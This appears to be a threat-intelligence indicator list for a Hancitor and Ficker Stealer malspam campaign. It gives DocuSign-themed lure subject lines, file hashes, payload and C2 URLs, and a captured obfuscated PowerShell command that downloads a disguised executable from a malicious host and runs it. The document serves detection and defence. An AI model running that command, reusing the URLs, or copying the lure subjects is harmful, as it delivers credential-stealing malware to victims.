- THREAT IDENTIFICATION: HANCITOR / FICKER STEALER
- HANCITOR BUILD NUMBER
- BUILD=0707in2_wvcr
- SUBJECTS OBSERVED
- You got invoice from DocuSign Electronic Service
- You got invoice from DocuSign Electronic Signature Service
- You got invoice from DocuSign Service
- You got invoice from DocuSign Signature Service
- You got notification from DocuSign Electronic Service
- You got notification from DocuSign Electronic Signature Service
- You got notification from DocuSign Service
- You got notification from DocuSign Signature Service
- You received invoice from DocuSign Electronic Service
- You received invoice from DocuSign Electronic Signature Service
- You received invoice from DocuSign Service
- You received invoice from DocuSign Signature Service
- You received notification from DocuSign Electronic Service
- You received notification from DocuSign Electronic Signature Service
- You received notification from DocuSign Service
- You received notification from DocuSign Signature Service
- SENDERS OBSERVED
- MALDOC PROXY DISTRIBUTION URLS
- MALDOC REDIRECT DOWNLOAD URLS
- MALDOC XLL FILE HASHES
- 0708_891792481.xll
- 41e0318dfdb1c180a375a7efc712649e
- MALDOC DOC FILE HASHES
- HANCITOR PAYLOAD DOWNLOAD URLS
- (this proceeded from running the .xll file)
- http://srand04rf.ru/92375234.xml
- http://srand04rf.ru/08.jpg
- HANCITOR PAYLOAD FILE HASH
- (as usual, this was dropped after enabling macros in the .doc file)
- niberius.dll
- 378d5008e351365908e039475b7180b0
- POWERSHELL SCRIPT FROM OPENING THE XLL FILE
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
- poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg' -OuTfIle 'c:\Users\Public\snd32sys.exe';
- sTart 'c:\Users\Public\snd32sys.exe'
- (this proceeded from running the .xll file)
- 92375234.xml
- 71999a9d2f15e164c9b1fa926aa6444b
- res32.hta (same hash)
- 71999a9d2f15e164c9b1fa926aa6444b
- ----------------------------------------
- 08.jpg
- ed1921467f6784af6bdca40a06a541b5
- snd32sys.exe (same hash)
- ed1921467f6784af6bdca40a06a541b5
- HANCITOR C2
- http://anspossthrly.ru/8/forum.php
- http://sudepallon.com/8/forum.php
- http://thentabecon.ru/8/forum.php
- FICKER STEALER DOWNLOAD URL
- http://srand04rf.ru/7hfjsdfjks.exe
- FICKER STEALER FILE HASH
- 7hfjsdfjks.exe
- 270c3859591599642bd15167765246e3
- FICKER C2
- http://pospvisis.com